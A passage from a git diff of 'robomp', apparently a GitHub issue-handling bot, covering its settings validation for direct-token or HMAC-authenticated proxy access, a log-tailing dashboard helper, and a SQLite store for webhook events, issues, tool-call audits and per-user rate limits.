type: ignore[attr-defined] + if isinstance(inner, str) and not inner.strip(): + return None + return value + + @model_validator(mode="after") + def _validate_proxy_or_pat(self) -> Settings: + """Enforce mutual exclusion between PAT and proxy mode. + + - Both set → reject (silent fallback to direct GitHub would defeat + the isolation goal). + - Proxy URL set but no HMAC key (or vice versa) → reject (gh-proxy + would either be unauthenticated or unreachable). + - Neither set → also reject; SOMETHING needs to talk to GitHub. + """ + has_token = self.github_token is not None + has_url = bool(self.gh_proxy_url) + has_key = self.gh_proxy_hmac_key is not None + if has_token and has_url: + raise ValueError( + "GITHUB_TOKEN and ROBOMP_GH_PROXY_URL are mutually exclusive — " + "set ONE to choose between direct-PAT and gh-proxy modes." + ) + if has_url != has_key: + raise ValueError( + "ROBOMP_GH_PROXY_URL and ROBOMP_GH_PROXY_HMAC_KEY must both be set together (or both empty)." + ) + if not has_token and not has_url: + raise ValueError( + "no GitHub access configured: set GITHUB_TOKEN, or set " + "ROBOMP_GH_PROXY_URL + ROBOMP_GH_PROXY_HMAC_KEY to use gh-proxy." + ) + return self + + @field_validator("repo_allowlist_raw", mode="before") + @classmethod + def _coerce_allowlist(cls, v: object) -> str: + if v is None: + return "" + if isinstance(v, str): + return v + if isinstance(v, (list, tuple)): + return ",".join(str(item) for item in v) + return str(v) + + @property + def repo_allowlist(self) -> frozenset[str]: + items = [piece.strip().lower() for piece in self.repo_allowlist_raw.split(",")] + return frozenset(item for item in items if item) + + @field_validator("rate_limit_unlimited_raw", mode="before") + @classmethod + def _coerce_unlimited(cls, v: object) -> str: + if v is None: + return "" + if isinstance(v, str): + return v + if isinstance(v, (list, tuple)): + return ",".join(str(item) for item in v) + return str(v) + + @property + def rate_limit_unlimited(self) -> frozenset[str]: + items = [piece.strip().lstrip("@").lower() for piece in self.rate_limit_unlimited_raw.split(",")] + return frozenset(item for item in items if item) + + @field_validator("maintainer_logins_raw", mode="before") + @classmethod + def _coerce_maintainers(cls, v: object) -> str: + if v is None: + return "" + if isinstance(v, str): + return v + if isinstance(v, (list, tuple)): + return ",".join(str(item) for item in v) + return str(v) + + @field_validator("reviewer_bots_raw", mode="before") + @classmethod + def _coerce_reviewer_bots(cls, v: object) -> str: + if v is None: + return "" + if isinstance(v, str): + return v + if isinstance(v, (list, tuple)): + return ",".join(str(item) for item in v) + return str(v) + + @property + def reviewer_bots(self) -> frozenset[str]: + items = [piece.strip().lstrip("@").lower() for piece in self.reviewer_bots_raw.split(",")] + return frozenset(item for item in items if item) + + @property + def maintainer_logins(self) -> frozenset[str]: + items = [piece.strip().lstrip("@").lower() for piece in self.maintainer_logins_raw.split(",")] + return frozenset(item for item in items if item) + + def allows(self, full_name: str) -> bool: + return full_name.lower() in self.repo_allowlist + + @property + def model_pool(self) -> tuple[str, ...]: + """ROBOMP_MODEL may be a single id or a comma-separated list; this + returns the parsed pool (always non-empty).""" + items = [piece.strip() for piece in self.model.split(",") if piece.strip()] + return tuple(items) or (self.model,) + + def pick_model(self) -> str: + """Random selection from the pool (uniform). One-element pools return that one.""" + return random.choice(self.model_pool) + + @property + def resolved_author_name(self) -> str: + """Falls back to bot_login if ROBOMP_GIT_AUTHOR_NAME isn't set.""" + return (self.git_author_name or self.bot_login).strip() + + def ensure_paths(self) -> None: + for path in (self.workspace_root, self.sqlite_path.parent, self.log_dir): + path.mkdir(parents=True, exist_ok=True) + + +@cache +def get_settings() -> Settings: + return Settings() # type: ignore[call-arg] + + +def reset_settings_cache() -> None: + """Invalidate the cached settings (tests).""" + get_settings.cache_clear() + + +class _ProxyEnvLoader(BaseSettings): + """Minimal env loader for `python -m robomp.proxy serve`. + + Validates only the fields the gh-proxy container actually needs + (PAT, HMAC key, bind address, paths). Keeping this separate from the + orchestrator-mode `Settings()` ctor avoids dragging in + `_validate_proxy_or_pat` and friends, which would reject a perfectly + valid proxy deployment (no webhook secret, no bot_login, no proxy URL) + before `serve()` can give a specific error. + """ + + model_config = SettingsConfigDict( + env_file=".env", + env_file_encoding="utf-8", + extra="ignore", + case_sensitive=False, + ) + + github_token: SecretStr = Field(..., alias="GITHUB_TOKEN") + gh_proxy_hmac_key: SecretStr = Field(..., alias="ROBOMP_GH_PROXY_HMAC_KEY") + gh_proxy_bind_host: str = Field("0.0.0.0", alias="ROBOMP_GH_PROXY_BIND_HOST") + gh_proxy_bind_port: int = Field(8081, alias="ROBOMP_GH_PROXY_BIND_PORT") + workspace_root: Path = Field(Path("./data/workspaces"), alias="ROBOMP_WORKSPACE_ROOT") + log_dir: Path = Field(Path("./data/logs"), alias="ROBOMP_LOG_DIR") + gh_proxy_max_body_bytes: int = Field(1 << 20, alias="ROBOMP_GH_PROXY_MAX_BODY_BYTES") + gh_proxy_git_timeout_seconds: float = Field(60.0, alias="ROBOMP_GH_PROXY_GIT_TIMEOUT_SECONDS") + + @field_validator("github_token", "gh_proxy_hmac_key", mode="before") + @classmethod + def _reject_blank(cls, value: object) -> object: + if isinstance(value, str) and not value.strip(): + raise ValueError("must be a non-empty string") + if hasattr(value, "get_secret_value"): + inner = value.get_secret_value() # type: ignore[attr-defined] + if isinstance(inner, str) and not inner.strip(): + raise ValueError("must be a non-empty string") + return value + + +def load_proxy_settings() -> Settings: + """Build a `Settings` instance suitable for the gh-proxy process. + + Only the env vars the proxy actually consumes are required; the + orchestrator-only fields (webhook secret, bot_login, …) are set to + inert placeholders since `proxy.server` never reads them. Skips the + `Settings()` cross-field validator (which presumes orchestrator + semantics) by routing through `model_construct`. + """ + loader = _ProxyEnvLoader() # type: ignore[call-arg] + return Settings.model_construct( + github_token=loader.github_token, + github_webhook_secret=SecretStr(""), + bot_login="gh-proxy", + git_author_email="gh-proxy@invalid", + gh_proxy_url=None, + gh_proxy_hmac_key=loader.gh_proxy_hmac_key, + gh_proxy_bind_host=loader.gh_proxy_bind_host, + gh_proxy_bind_port=loader.gh_proxy_bind_port, + workspace_root=loader.workspace_root, + log_dir=loader.log_dir, + gh_proxy_max_body_bytes=loader.gh_proxy_max_body_bytes, + gh_proxy_git_timeout_seconds=loader.gh_proxy_git_timeout_seconds, + ) diff --git a/python/robomp/src/dashboard.py b/python/robomp/src/dashboard.py new file mode 100644 index 000000000..09a903364 --- /dev/null +++ b/python/robomp/src/dashboard.py @@ -0,0 +1,139 @@ +"""Status dashboard helpers: log tail + the static SPA served at `/`. + +The HTML/JS/CSS live under `src/static/`, produced by the Vite build in +`web/`. This module just locates the bundle, substitutes the per-instance +config sentinel, and exposes a small API to the FastAPI app. +""" + +from __future__ import annotations + +import json +from functools import cache +from pathlib import Path +from typing import Any + +# Tail at most this many bytes from the end of the log file. Caps work for any +# `limit`, even pathologically large ones, on a multi-MB rotating file. +_TAIL_MAX_BYTES = 2 * 1024 * 1024 + +# Sentinel literally embedded in the built `index.html`; replaced per-request +# with a JSON config blob so the SPA can pick up the replay token. +_CONFIG_SENTINEL = "__ROBOMP_CONFIG__" + +_STATIC_DIR = Path(__file__).resolve().parent / "static" +_INDEX_PATH = _STATIC_DIR / "index.html" + + +def tail_jsonl(path: Path, *, limit: int) -> list[dict[str, Any]]: + """Return up to `limit` JSON log records from the tail of `path` (oldest first). + + Lines that fail to parse are returned as `{"level": "RAW", "msg": <line>}` + so a malformed final line never blanks the whole view. + """ + if limit <= 0 or not path.exists(): + return [] + + try: + size = path.stat().st_size + except OSError: + return [] + if size == 0: + return [] + + read_size = min(size, _TAIL_MAX_BYTES) + with path.open("rb") as fh: + fh.seek(size - read_size) + chunk = fh.read(read_size) + + # If we started mid-line, drop the partial leading line. + if read_size < size: + nl = chunk.find(b"\n") + if nl == -1: + return [] + chunk = chunk[nl + 1 :] + + lines = chunk.splitlines() + out: list[dict[str, Any]] = [] + for raw in lines[-limit:]: + line = raw.strip() + if not line: + continue + try: + obj = json.loads(line) + if isinstance(obj, dict): + out.append(obj) + continue + except json.JSONDecodeError: + pass + out.append({"level": "RAW", "logger": "raw", "msg": line.decode("utf-8", errors="replace")}) + return out + + +class DashboardBundleMissing(RuntimeError): + """Raised when the built frontend bundle is unavailable. + + The dev workflow is `bun run web:build` (one-shot Bun + Vite build); the + Docker image bakes the bundle in via the `web-builder` stage. Tests use a + placeholder `index.html` written into the static dir by `conftest.py`, + so this never fires in CI. + """ + + +def static_dir() -> Path: + """Filesystem path the FastAPI app mounts at `/static`. + + Creates the directory lazily so a fresh checkout (or a runtime container + that hasn't shipped the bundle yet) can still construct the app — + `_load_index_template()` raises `DashboardBundleMissing` separately when + the `index.html` itself is missing. Without this mkdir, + `StaticFiles(directory=...)` would raise at app construction time and + block every other route. + """ + _STATIC_DIR.mkdir(parents=True, exist_ok=True) + return _STATIC_DIR + + +@cache +def _load_index_template() -> str: + try: + text = _INDEX_PATH.read_text(encoding="utf-8") + except FileNotFoundError as exc: # pragma: no cover — repo ships the stub + raise DashboardBundleMissing(f"frontend bundle missing at {_INDEX_PATH}; run `bun run web:build`") from exc + if _CONFIG_SENTINEL not in text: + raise DashboardBundleMissing( + f"frontend bundle at {_INDEX_PATH} is missing the {_CONFIG_SENTINEL} sentinel; " + "rebuild with `bun run web:build`" + ) + return text + + +def reset_index_cache() -> None: + """Drop the cached template. Called by tests that swap the static dir.""" + _load_index_template.cache_clear() + + +def render_index(replay_token: str | None) -> str: + """Render the dashboard HTML with the server's replay token baked in. + + The token lands inside a `<script type="application/json">` block that the + page parses at startup and attaches to every privileged fetch. The user + never sees or types it; the only credential to manage is the env var on + the server itself. + """ + config = { + "replayEnabled": bool(replay_token), + "replayToken": replay_token or "", + } + # `</` would otherwise let an attacker-controlled token break out of the + # script element; escape it the standard way. + payload = json.dumps(config, separators=(",", ":")).replace("</", "<\\/") + return _load_index_template().replace(_CONFIG_SENTINEL, payload) + + +__all__ = [ + "DashboardBundleMissing", + "render_index", + "reset_index_cache", + "static_dir", + "tail_jsonl", +] diff --git a/python/robomp/src/db.py b/python/robomp/src/db.py new file mode 100644 index 000000000..a3d27aee7 --- /dev/null +++ b/python/robomp/src/db.py @@ -0,0 +1,1010 @@ +"""SQLite-backed durable event queue + bot state.""" + +from __future__ import annotations + +import json +import sqlite3 +import threading +from collections.abc import Iterable, Iterator, Mapping +from contextlib import contextmanager +from dataclasses import dataclass +from datetime import UTC, datetime, timedelta +from pathlib import Path +from typing import Any, Literal + +EventState = Literal["queued", "running", "done", "failed", "skipped"] +INACTIVE_EVENT_STATES: tuple[EventState, ...] = ("done", "failed", "skipped") + +IssueState = Literal[ + "new", + "reproducing", + "fixing", + "opened", + "merged", + "closed", + "abandoned", +] + +SCHEMA = """ +PRAGMA journal_mode = WAL; +PRAGMA synchronous = NORMAL; +PRAGMA foreign_keys = ON; + +CREATE TABLE IF NOT EXISTS events ( + delivery_id TEXT PRIMARY KEY, + event_type TEXT NOT NULL, + repo TEXT, + issue_key TEXT, + payload_json TEXT NOT NULL, + received_at TEXT NOT NULL, + state TEXT NOT NULL + CHECK (state IN ('queued','running','done','failed','skipped')), + attempts INTEGER NOT NULL DEFAULT 0, + last_error TEXT, + started_at TEXT, + finished_at TEXT, + model TEXT +); + +CREATE INDEX IF NOT EXISTS events_state_received + ON events(state, received_at); + +CREATE TABLE IF NOT EXISTS issues ( + key TEXT PRIMARY KEY, + repo TEXT NOT NULL, + number INTEGER NOT NULL, + branch TEXT, + session_dir TEXT, + pr_number INTEGER, + state TEXT NOT NULL, + classification TEXT, -- bug|enhancement|question|proposal|documentation|invalid|duplicate + updated_at TEXT NOT NULL +); + +CREATE TABLE IF NOT EXISTS tool_calls ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + issue_key TEXT NOT NULL, + tool TEXT NOT NULL, + args_json TEXT NOT NULL, + result_json TEXT, + error TEXT, + ts TEXT NOT NULL +); +CREATE INDEX IF NOT EXISTS tool_calls_issue ON tool_calls(issue_key, ts); + +CREATE TABLE IF NOT EXISTS submissions ( + delivery_id TEXT PRIMARY KEY, + login TEXT NOT NULL, + repo TEXT, + ts TEXT NOT NULL +); +CREATE INDEX IF NOT EXISTS submissions_login_ts ON submissions(login, ts); + +CREATE TABLE IF NOT EXISTS pending_closures ( + issue_key TEXT PRIMARY KEY, + repo TEXT NOT NULL, + number INTEGER NOT NULL, + comment_id INTEGER NOT NULL, + issue_author TEXT NOT NULL, + close_at TEXT NOT NULL, + state TEXT NOT NULL CHECK (state IN ('pending','claimed','closed','cancelled')), + cancel_reason TEXT, + created_at TEXT NOT NULL, + updated_at TEXT NOT NULL +); +CREATE INDEX IF NOT EXISTS pending_closures_state_close_at + ON pending_closures(state, close_at); +""" + + +def _utcnow() -> str: + return datetime.now(UTC).strftime("%Y-%m-%dT%H:%M:%S.%fZ") + + +def iso_seconds_ago(seconds: float) -> str: + """ISO-UTC timestamp for `seconds` ago, matching the format `_utcnow` writes.""" + return (datetime.now(UTC) - timedelta(seconds=seconds)).strftime("%Y-%m-%dT%H:%M:%S.%fZ") + + +@dataclass(slots=True, frozen=True) +class EventRow: + delivery_id: str + event_type: str + repo: str | None + issue_key: str | None + payload: dict[str, Any] + received_at: str + state: EventState + attempts: int + last_error: str | None + + +@dataclass(slots=True, frozen=True) +class IssueRow: + key: str + repo: str + number: int + branch: str | None + session_dir: str | None + pr_number: int | None + state: IssueState + updated_at: str + classification: str | None = None + + +def _event_row_from_db_row(row: sqlite3.Row) -> EventRow: + return EventRow( + delivery_id=row["delivery_id"], + event_type=row["event_type"], + repo=row["repo"], + issue_key=row["issue_key"], + payload=json.loads(row["payload_json"]), + received_at=row["received_at"], + state=row["state"], + attempts=int(row["attempts"]), + last_error=row["last_error"], + ) + + +@dataclass(slots=True, frozen=True) +class SubmissionAdmission: + accepted: bool + duplicate: bool + used: int + + +PendingClosureState = Literal["pending", "claimed", "closed", "cancelled"] + + +@dataclass(slots=True, frozen=True) +class PendingClosureRow: + issue_key: str + repo: str + number: int + comment_id: int + issue_author: str + close_at: str + state: PendingClosureState + cancel_reason: str | None + created_at: str + updated_at: str + + +def _pending_closure_from_row(row: sqlite3.Row) -> PendingClosureRow: + return PendingClosureRow( + issue_key=row["issue_key"], + repo=row["repo"], + number=int(row["number"]), + comment_id=int(row["comment_id"]), + issue_author=row["issue_author"], + close_at=row["close_at"], + state=row["state"], + cancel_reason=row["cancel_reason"], + created_at=row["created_at"], + updated_at=row["updated_at"], + ) + + +def issue_key(repo: str, number: int) -> str: + return f"{repo}#{number}" + + +class Database: + """Thread-safe sqlite wrapper. One connection per thread via locks.""" + + def __init__(self, path: Path) -> None: + self.path = path + path.parent.mkdir(parents=True, exist_ok=True) + self._lock = threading.RLock() + self._conn = sqlite3.connect(str(path), check_same_thread=False, isolation_level=None) + self._conn.row_factory = sqlite3.Row + with self._lock: + self._conn.executescript(SCHEMA) + self._migrate() + + def _migrate(self) -> None: + # SQLite-friendly forward migrations. Each is idempotent. + issue_cols = {row[1] for row in self._conn.execute("PRAGMA table_info(issues)").fetchall()} + if "classification" not in issue_cols: + self._conn.execute("ALTER TABLE issues ADD COLUMN classification TEXT") + event_cols = {row[1] for row in self._conn.execute("PRAGMA table_info(events)").fetchall()} + if "model" not in event_cols: + self._conn.execute("ALTER TABLE events ADD COLUMN model TEXT") + + def close(self) -> None: + with self._lock: + self._conn.close() + + @contextmanager + def _txn(self) -> Iterator[sqlite3.Connection]: + with self._lock: + self._conn.execute("BEGIN IMMEDIATE") + try: + yield self._conn + self._conn.execute("COMMIT") + except BaseException: + self._conn.execute("ROLLBACK") + raise + + # ---- events ---- + def record_event( + self, + *, + delivery_id: str, + event_type: str, + repo: str | None, + issue_key: str | None, + payload: Mapping[str, Any], + state: EventState = "queued", + last_error: str | None = None, + ) -> bool: + """Insert a webhook event. Returns False if duplicate (by delivery id). + + `last_error` is the reason text surfaced on the dashboard for non-queued + states (skipped, failed). Ignored when state == 'queued'. + """ + now = _utcnow() + with self._lock: + cur = self._conn.execute( + """ + INSERT OR IGNORE INTO events + (delivery_id, event_type, repo, issue_key, payload_json, received_at, state, last_error) + VALUES (?, ?, ?, ?, ?, ?, ?, ?) + """, + ( + delivery_id, + event_type, + repo, + issue_key, + json.dumps(payload, separators=(",", ":")), + now, + state, + last_error, + ), + ) + return cur.rowcount > 0 + + def claim_next_event(self) -> EventRow | None: + """Atomically dequeue one queued event into running state.""" + with self._txn() as conn: + row = conn.execute( + """ + SELECT delivery_id, event_type, repo, issue_key, payload_json, received_at, + state, attempts, last_error + FROM events + WHERE state = 'queued' + ORDER BY received_at + LIMIT 1 + """ + ).fetchone() + if row is None: + return None + now = _utcnow() + conn.execute( + "UPDATE events SET state='running', attempts=attempts+1, started_at=? WHERE delivery_id=?", + (now, row["delivery_id"]), + ) + return EventRow( + delivery_id=row["delivery_id"], + event_type=row["event_type"], + repo=row["repo"], + issue_key=row["issue_key"], + payload=json.loads(row["payload_json"]), + received_at=row["received_at"], + state="running", + attempts=int(row["attempts"]) + 1, + last_error=row["last_error"], + ) + + def mark_event(self, delivery_id: str, state: EventState, *, error: str | None = None) -> None: + with self._lock: + self._conn.execute( + "UPDATE events SET state=?, last_error=?, finished_at=? WHERE delivery_id=?", + (state, error, _utcnow(), delivery_id), + ) + + def set_event_model(self, delivery_id: str, model: str) -> None: + """Persist the model the worker actually picked for this event. + + Called once per run, right after `pick_model()`, so the dashboard and + post-mortems can attribute behavior to the exact model used. + """ + with self._lock: + self._conn.execute( + "UPDATE events SET model=? WHERE delivery_id=?", + (model, delivery_id), + ) + + def reset_stuck_running(self) -> int: + """Recover events that were running at shutdown.""" + with self._lock: + cur = self._conn.execute( + "UPDATE events SET state='queued' WHERE state='running'", + ) + return cur.rowcount + + def list_events(self, *, limit: int = 50) -> list[EventRow]: + with self._lock: + rows = self._conn.execute( + """ + SELECT delivery_id, event_type, repo, issue_key, payload_json, received_at, + state, attempts, last_error + FROM events + ORDER BY received_at DESC + LIMIT ? + """, + (limit,), + ).fetchall() + return [ + EventRow( + delivery_id=row["delivery_id"], + event_type=row["event_type"], + repo=row["repo"], + issue_key=row["issue_key"], + payload=json.loads(row["payload_json"]), + received_at=row["received_at"], + state=row["state"], + attempts=int(row["attempts"]), + last_error=row["last_error"], + ) + for row in rows + ] + + def remove_event(self, delivery_id: str) -> None: + """Hard-delete an event row. Used to clear stale state before a manual re-trigger.""" + with self._lock: + self._conn.execute("DELETE FROM events WHERE delivery_id=?", (delivery_id,)) + + def replace_event_if_state_in( + self, + *, + delivery_id: str, + event_type: str, + repo: str | None, + issue_key: str | None, + payload: Mapping[str, Any], + state: EventState = "queued", + allowed_existing_states: tuple[EventState, ...], + ) -> bool: + """Replace an existing event only when its current state is permitted.""" + now = _utcnow() + with self._txn() as conn: + row = conn.execute( + "SELECT state FROM events WHERE delivery_id = ?", + (delivery_id,), + ).fetchone() + if row is not None: + if row["state"] not in allowed_existing_states: + return False + conn.execute("DELETE FROM events WHERE delivery_id = ?", (delivery_id,)) + conn.execute( + """ + INSERT INTO events + (delivery_id, event_type, repo, issue_key, payload_json, received_at, state) + VALUES (?, ?, ?, ?, ?, ?, ?) + """, + ( + delivery_id, + event_type, + repo, + issue_key, + json.dumps(payload, separators=(",", ":")), + now, + state, + ), + ) + return True + + def latest_event_for_issue(self, key: str, *, include_skipped: bool = False) -> EventRow | None: + """Return the newest event for an issue. + + By default this ignores `skipped` rows. Those are usually webhook noise + (`issues.labeled ignored`, bot/self comments) and must not hide the last + real processing run when the dashboard retries a failed issue. + """ + state_filter = "" if include_skipped else "AND state <> 'skipped'" + with self._lock: + row = self._conn.execute( + f""" + SELECT delivery_id, event_type, repo, issue_key, payload_json, received_at, + state, attempts, last_error + FROM events + WHERE issue_key = ? + {state_filter} + ORDER BY received_at DESC, rowid DESC + LIMIT 1 + """, + (key,), + ).fetchone() + if row is None: + return None + return _event_row_from_db_row(row) + + def latest_events_for_issues( + self, + keys: Iterable[str], + *, + include_skipped: bool = False, + ) -> dict[str, EventRow]: + """Return newest event rows keyed by issue key for a bounded issue set.""" + unique = tuple({k for k in keys if k}) + if not unique: + return {} + state_filter = "" if include_skipped else "AND state <> 'skipped'" + out: dict[str, EventRow] = {} + with self._lock: + for start in range(0, len(unique), 500): + batch = unique[start : start + 500] + placeholders = ",".join("?" * len(batch)) + rows = self._conn.execute( + f""" + SELECT delivery_id, event_type, repo, issue_key, payload_json, received_at, + state, attempts, last_error + FROM events + WHERE issue_key IN ({placeholders}) + {state_filter} + ORDER BY issue_key ASC, received_at DESC, rowid DESC + """, + batch, + ).fetchall() + for row in rows: + issue = row["issue_key"] + if issue not in out: + out[issue] = _event_row_from_db_row(row) + return out + + def event_state_counts(self) -> dict[str, int]: + """Return current row counts per event state, including states with zero rows.""" + with self._lock: + rows = self._conn.execute("SELECT state, COUNT(*) AS n FROM events GROUP BY state").fetchall() + counts: dict[str, int] = dict.fromkeys(("queued", "running", "done", "failed", "skipped"), 0) + for row in rows: + counts[row["state"]] = int(row["n"]) + return counts + + def latest_issue_event_state_counts(self) -> dict[str, int]: + """Count each issue by its newest non-skipped event state. + + This is the dashboard's "current issue event" view: a later successful + run clears an older failure for that issue, and ignored webhook noise + does not make a failed issue look skipped. + """ + counts: dict[str, int] = dict.fromkeys(("queued", "running", "done", "failed", "skipped"), 0) + seen: set[str] = set() + with self._lock: + rows = self._conn.execute( + """ + SELECT issue_key, state + FROM events + WHERE issue_key IS NOT NULL + AND state <> 'skipped' + ORDER BY issue_key ASC, received_at DESC, rowid DESC + """ + ).fetchall() + for row in rows: + key = row["issue_key"] + if key in seen: + continue + seen.add(key) + counts[row["state"]] += 1 + return counts + + def list_running_events(self) -> list[dict[str, Any]]: + """Snapshot of currently-running events. + + Returns elapsed-time inputs (`started_at`) plus per-run telemetry: + - `model`: the omp model the worker picked for this run, set after + `pick_model()` so it reflects the actual pool selection. + - `last_tool` / `last_tool_ts`: the most recent host-tool call audited + on the same `issue_key` since `started_at`. Scoping by start time + prevents stale entries from a prior run on the same issue leaking + into the dashboard before this run has emitted any tool calls. + """ + with self._lock: + rows = self._conn.execute( + """ + SELECT e.delivery_id, e.event_type, e.repo, e.issue_key, e.received_at, + e.started_at, e.attempts, e.model, + (SELECT tool FROM tool_calls + WHERE issue_key = e.issue_key AND ts >= e.started_at + ORDER BY ts DESC LIMIT 1) AS last_tool, + (SELECT ts FROM tool_calls + WHERE issue_key = e.issue_key AND ts >= e.started_at + ORDER BY ts DESC LIMIT 1) AS last_tool_ts + FROM events e + WHERE e.state = 'running' + ORDER BY COALESCE(e.started_at, e.received_at) + """ + ).fetchall() + return [ + { + "delivery_id": r["delivery_id"], + "event_type": r["event_type"], + "repo": r["repo"], + "issue_key": r["issue_key"], + "received_at": r["received_at"], + "started_at": r["started_at"], + "attempts": int(r["attempts"]), + "model": r["model"], + "last_tool": r["last_tool"], + "last_tool_ts": r["last_tool_ts"], + } + for r in rows + ] + + def get_event(self, delivery_id: str) -> EventRow | None: + with self._lock: + row = self._conn.execute( + """ + SELECT delivery_id, event_type, repo, issue_key, payload_json, received_at, + state, attempts, last_error + FROM events WHERE delivery_id = ? + """, + (delivery_id,), + ).fetchone() + if row is None: + return None + return EventRow( + delivery_id=row["delivery_id"], + event_type=row["event_type"], + repo=row["repo"], + issue_key=row["issue_key"], + payload=json.loads(row["payload_json"]), + received_at=row["received_at"], + state=row["state"], + attempts=int(row["attempts"]), + last_error=row["last_error"], + ) + + def requeue_event( + self, + delivery_id: str, + *, + from_states: tuple[EventState, ...] | None = None, + ) -> bool: + """Move an event back to queued without clobbering last_error. + + Returns True only when a row was actually transitioned. `from_states` + restricts which current states may be requeued; callers use this to + keep public retries from mutating queued/running rows while preserving + internal recovery of a just-claimed running event. + """ + with self._lock: + if from_states is None: + cur = self._conn.execute( + "UPDATE events SET state='queued' WHERE delivery_id=?", + (delivery_id,), + ) + elif not from_states: + return False + else: + placeholders = ",".join("?" for _ in from_states) + cur = self._conn.execute( + f"UPDATE events SET state='queued' WHERE delivery_id=? AND state IN ({placeholders})", + (delivery_id, *from_states), + ) + return cur.rowcount > 0 + + # ---- issues ---- + def upsert_issue( + self, + *, + key: str, + repo: str, + number: int, + state: IssueState, + branch: str | None = None, + session_dir: str | None = None, + pr_number: int | None = None, + ) -> IssueRow: + now = _utcnow() + with self._lock: + self._conn.execute( + """ + INSERT INTO issues (key, repo, number, branch, session_dir, pr_number, state, updated_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?) + ON CONFLICT(key) DO UPDATE SET + branch = COALESCE(excluded.branch, issues.branch), + session_dir = COALESCE(excluded.session_dir, issues.session_dir), + pr_number = COALESCE(excluded.pr_number, issues.pr_number), + state = excluded.state, + updated_at = excluded.updated_at + """, + (key, repo, number, branch, session_dir, pr_number, state, now), + ) + got = self.get_issue(key) + assert got is not None + return got + + def set_issue_state(self, key: str, state: IssueState) -> None: + with self._lock: + self._conn.execute( + "UPDATE issues SET state=?, updated_at=? WHERE key=?", + (state, _utcnow(), key), + ) + + def set_issue_pr(self, key: str, pr_number: int) -> None: + with self._lock: + self._conn.execute( + "UPDATE issues SET pr_number=?, updated_at=? WHERE key=?", + (pr_number, _utcnow(), key), + ) + + def set_issue_classification(self, key: str, classification: str) -> None: + with self._lock: + self._conn.execute( + "UPDATE issues SET classification=?, updated_at=? WHERE key=?", + (classification, _utcnow(), key), + ) + + def set_issue_branch(self, key: str, branch: str) -> None: + with self._lock: + self._conn.execute( + "UPDATE issues SET branch=?, updated_at=? WHERE key=?", + (branch, _utcnow(), key), + ) + + def get_issue(self, key: str) -> IssueRow | None: + with self._lock: + row = self._conn.execute( + "SELECT key, repo, number, branch, session_dir, pr_number, state, classification, updated_at FROM issues WHERE key=?", + (key,), + ).fetchone() + if row is None: + return None + return IssueRow( + key=row["key"], + repo=row["repo"], + number=int(row["number"]), + branch=row["branch"], + session_dir=row["session_dir"], + pr_number=int(row["pr_number"]) if row["pr_number"] is not None else None, + state=row["state"], + updated_at=row["updated_at"], + classification=row["classification"], + ) + + def find_issue_by_pr(self, repo: str, pr_number: int) -> IssueRow | None: + with self._lock: + row = self._conn.execute( + "SELECT key, repo, number, branch, session_dir, pr_number, state, classification, updated_at FROM issues WHERE repo=? AND pr_number=?", + (repo, pr_number), + ).fetchone() + if row is None: + return None + return IssueRow( + key=row["key"], + repo=row["repo"], + number=int(row["number"]), + branch=row["branch"], + session_dir=row["session_dir"], + pr_number=int(row["pr_number"]), + state=row["state"], + updated_at=row["updated_at"], + classification=row["classification"], + ) + + def find_issue_by_branch(self, repo: str, branch: str) -> IssueRow | None: + with self._lock: + row = self._conn.execute( + """ + SELECT key, repo, number, branch, session_dir, pr_number, state, classification, updated_at + FROM issues + WHERE repo=? AND branch=? + ORDER BY updated_at DESC + LIMIT 1 + """, + (repo, branch), + ).fetchone() + if row is None: + return None + return IssueRow( + key=row["key"], + repo=row["repo"], + number=int(row["number"]), + branch=row["branch"], + session_dir=row["session_dir"], + pr_number=int(row["pr_number"]) if row["pr_number"] is not None else None, + state=row["state"], + updated_at=row["updated_at"], + classification=row["classification"], + ) + + def list_issues(self, limit: int = 100) -> list[IssueRow]: + with self._lock: + rows = self._conn.execute( + "SELECT key, repo, number, branch, session_dir, pr_number, state, classification, updated_at FROM issues ORDER BY updated_at DESC LIMIT ?", + (limit,), + ).fetchall() + return [ + IssueRow( + key=r["key"], + repo=r["repo"], + number=int(r["number"]), + branch=r["branch"], + session_dir=r["session_dir"], + pr_number=int(r["pr_number"]) if r["pr_number"] is not None else None, + state=r["state"], + updated_at=r["updated_at"], + classification=r["classification"], + ) + for r in rows + ] + + def processed_issue_keys(self, keys: Iterable[str]) -> set[str]: + """Return the subset of `keys` that have a row in the `issues` table. + + Membership in `issues` means robomp has at minimum upserted state for the + issue — i.e. it has been picked up by the dispatcher at least once. Used + by the browse panel to hide issues we've already started on. + """ + unique = tuple({k for k in keys if k}) + if not unique: + return set() + # SQLite parameter limit is 999 by default; chunk to stay well under it. + out: set[str] = set() + with self._lock: + for start in range(0, len(unique), 500): + batch = unique[start : start + 500] + placeholders = ",".join("?" * len(batch)) + rows = self._conn.execute( + f"SELECT key FROM issues WHERE key IN ({placeholders})", + batch, + ).fetchall() + out.update(r["key"] for r in rows) + return out + + # ---- tool_calls ---- + def log_tool_call( + self, + *, + issue_key: str, + tool: str, + args: Mapping[str, Any], + result: Mapping[str, Any] | None = None, + error: str | None = None, + ) -> int: + with self._lock: + cur = self._conn.execute( + "INSERT INTO tool_calls (issue_key, tool, args_json, result_json, error, ts) VALUES (?, ?, ?, ?, ?, ?)", + ( + issue_key, + tool, + json.dumps(args, separators=(",", ":"), default=str), + json.dumps(result, separators=(",", ":"), default=str) if result is not None else None, + error, + _utcnow(), + ), + ) + return int(cur.lastrowid or 0) + + # ---- submissions (per-user rate limiting) ---- + def admit_submission( + self, + *, + delivery_id: str, + login: str, + repo: str | None, + since: str, + cap: int | None, + ) -> SubmissionAdmission: + """Atomically check a submitter's rolling cap and record this delivery. + + Duplicate delivery ids are accepted without inserting a second row, so a + webhook retry remains idempotent even after the submitter reaches the cap. + `used` is the matching submission count after acceptance, or the count + that caused rejection when `accepted` is False. + """ + normalized_login = login.lower() + with self._txn() as conn: + existing = conn.execute( + "SELECT 1 FROM submissions WHERE delivery_id=?", + (delivery_id,), + ).fetchone() + if existing is not None: + row = conn.execute( + "SELECT COUNT(*) AS n FROM submissions WHERE login=? AND ts>=?", + (normalized_login, since), + ).fetchone() + return SubmissionAdmission( + accepted=True, + duplicate=True, + used=int(row["n"]) if row is not None else 0, + ) + + row = conn.execute( + "SELECT COUNT(*) AS n FROM submissions WHERE login=? AND ts>=?", + (normalized_login, since), + ).fetchone() + used = int(row["n"]) if row is not None else 0 + if cap is not None and used >= cap: + return SubmissionAdmission(accepted=False, duplicate=False, used=used) + + conn.execute( + "INSERT INTO submissions (delivery_id, login, 